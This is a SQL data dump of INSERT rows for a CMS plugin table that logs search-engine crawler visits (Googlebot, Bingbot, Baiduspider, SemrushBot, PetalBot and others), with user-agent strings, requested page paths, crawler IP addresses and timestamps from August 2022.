INSERT INTO `ey_weapp_spider_visit` VALUES ('94582', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/59.html', '185.191.171.7', '1660357759', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94580', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/368.html', '157.55.39.41', '1660357126', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94589', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/229.html', '116.179.32.32', '1660359146', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94594', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/23_4.html', '185.191.171.4', '1660364697', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94597', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/129.html', '66.249.79.108', '1660365367', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94601', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/142.html', '216.244.66.194', '1660367301', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94605', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660369145', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94607', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_20.html', '116.179.32.216', '1660370233', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94617', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/message/', '114.119.151.153', '1660381821', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94611', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_15/', '116.179.32.96', '1660372351', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94614', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/list_4_2/', '185.191.171.25', '1660375774', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94615', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.40', '1660376757', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94616', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/460.html', '114.119.151.153', '1660380975', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94618', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/chukouquanqiu', '185.191.171.6', '1660381909', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94622', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/178.html', '114.119.151.153', '1660382640', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94623', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_44/', '114.119.151.155', '1660382746', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94625', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/463.html', '185.191.171.22', '1660383585', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94626', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/208.html', '185.191.171.25', '1660383696', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94628', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_12.html', '185.191.171.23', '1660385320', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94629', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_29.html', '185.191.171.39', '1660385804', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94633', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/431.html', '185.191.171.41', '1660387870', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94635', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/88.html', '66.249.79.108', '1660390885', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94704', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/gongsijianjie/', '185.191.171.1', '1660422132', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94723', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/list_4_5/', '114.119.151.155', '1660432733', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94741', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/194.html', '185.191.171.44', '1660440328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94746', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/243.html', '66.249.79.108', '1660447835', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94760', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/list_2_3', '114.119.151.155', '1660456750', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94761', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660458120', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94764', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/344.html', '66.249.79.110', '1660459354', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94767', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_3.html', '185.191.171.18', '1660461073', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94781', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1660469770', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94769', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/185.html', '185.191.171.15', '1660463385', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94770', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/232.html', '66.249.79.110', '1660463478', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94772', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_23/', '185.191.171.1', '1660464638', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94774', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_4/', '185.191.171.26', '1660466020', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94775', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/', '207.46.13.59', '1660466310', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94776', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/114.html', '185.191.171.15', '1660467257', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94783', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/bengche/', '157.55.39.41', '1660471298', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94798', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_4/', '216.244.66.194', '1660475635', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94797', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_33/', '216.244.66.194', '1660475445', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94799', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.110', '1660475871', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94803', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1660477670', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94892', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_62/', '216.244.66.194', '1660524894', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94893', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/czb/', '185.191.171.2', '1660526113', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94898', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/', '207.46.13.59', '1660531194', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94896', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/116.html', '185.191.171.36', '1660531162', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94902', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1660532895', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94907', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1660535377', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94912', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/288.html', '185.191.171.24', '1660537873', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94919', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/208.html', '220.181.108.167', '1660539106', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94920', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sys.html', '114.119.151.155', '1660539123', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94946', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.79', '1660552843', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94925', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/217.html', '207.46.13.179', '1660539900', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94926', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/198.html', '66.249.79.108', '1660540027', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94944', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/380.html', '185.191.171.5', '1660551834', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94929', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/243.html', '207.46.13.59', '1660543523', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94939', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/121.html', '116.179.32.165', '1660550711', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94942', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/317.html', '17.121.112.9', '1660551236', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94965', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/221.html', '66.249.79.112', '1660564382', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94967', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/141.html', '157.55.39.41', '1660564971', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94970', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/101.html', '185.191.171.5', '1660565659', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94977', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/', '54.193.30.147', '1660571293', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94975', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/467.html', '66.249.79.108', '1660569205', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94976', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/208.html', '66.249.79.112', '1660569335', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94979', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/337.html', '54.193.30.147', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94981', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/306.html', '54.183.234.94', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95001', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/', '114.119.151.153', '1660572853', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95002', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/52_2.html', '185.191.171.23', '1660573446', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95003', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/43.html', '185.191.171.1', '1660574151', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95004', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/buliaojial/', '114.119.151.153', '1660577248', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95005', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/393.html', '114.119.151.153', '1660577421', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95008', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/335.html', '185.191.171.21', '1660579623', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95017', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/264.html', '66.249.79.112', '1660583278', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95018', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/152.html', '66.249.79.108', '1660583982', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95031', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/21_2.html', '185.191.171.36', '1660590661', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95019', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/chukouquanqiu', '185.191.171.1', '1660584983', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95020', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/', '207.46.13.59', '1660585659', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95021', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.112', '1660585783', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95030', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/218.html', '185.191.171.17', '1660589794', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95022', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660585800', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95023', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/344.html', '66.249.79.110', '1660587801', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95024', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/392.html', '185.191.171.12', '1660588230', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95025', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/390.html', '185.191.171.36', '1660588622', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95026', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_12.html', '185.191.171.9', '1660588932', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95027', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/148.html', '185.191.171.26', '1660588966', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95028', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/344.html', '66.249.79.108', '1660589447', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95029', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73_2.html', '185.191.171.40', '1660589579', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95035', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/80.html', '220.181.108.110', '1660592944', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95033', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_50/', '185.191.171.6', '1660592870', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95040', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/289.html', '185.191.171.24', '1660593457', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95068', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/57.html', '66.249.79.112', '1660607170', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95069', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/list_2_2/', '66.249.79.110', '1660607224', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95037', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_19.html', '220.181.108.149', '1660592944', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95038', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_28/', '116.179.32.44', '1660592946', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95042', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/110.html', '116.179.32.23', '1660594346', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95043', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_27/', '220.181.108.158', '1660594346', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95047', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_18.html', '185.191.171.11', '1660596457', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95045', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660594914', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95083', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/209.html', '220.181.108.177', '1660615472', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95089', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_6.html', '185.191.171.10', '1660618704', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95092', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_2.html', '185.191.171.19', '1660619787', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95147', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/298.html', '185.191.171.13', '1660642689', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95144', '99', 'mozilla/5.0 (compatible; neevabot/1.0; +https://neeva.com/neevabot)', '/message/', '100.26.127.17', '1660641296', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95212', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1660674578', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95194', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/245.html', '66.249.79.132', '1660663262', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95224', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/gjxw/', '185.191.171.7', '1660682397', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95229', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.27', '1660688203', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95231', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660690328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95235', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/163.html', '185.191.171.2', '1660693969', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95237', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/225.html', '157.55.39.41', '1660696518', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95240', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '114.45.40.55', '1660698069', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96381', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/343.html', '220.181.108.94', '1661283790', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95243', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/386.html', '66.249.79.110', '1660699749', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95244', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_39/', '114.119.151.155', '1660700140', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96378', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.112', '1661283319', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95511', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/339.html', '66.249.79.108', '1660861539', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95514', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/338.html', '114.119.151.153', '1660863097', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95248', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.83', '1660702626', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95508', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.77', '1660861192', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95502', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_49/', '185.191.171.10', '1660858587', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95260', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660708002', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95267', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/164.html', '185.191.171.16', '1660715165', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95493', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_23/', '185.191.171.7', '1660855011', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95486', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/461.html', '185.191.171.12', '1660850860', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95487', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_36.html', '185.191.171.44', '1660851559', '0');
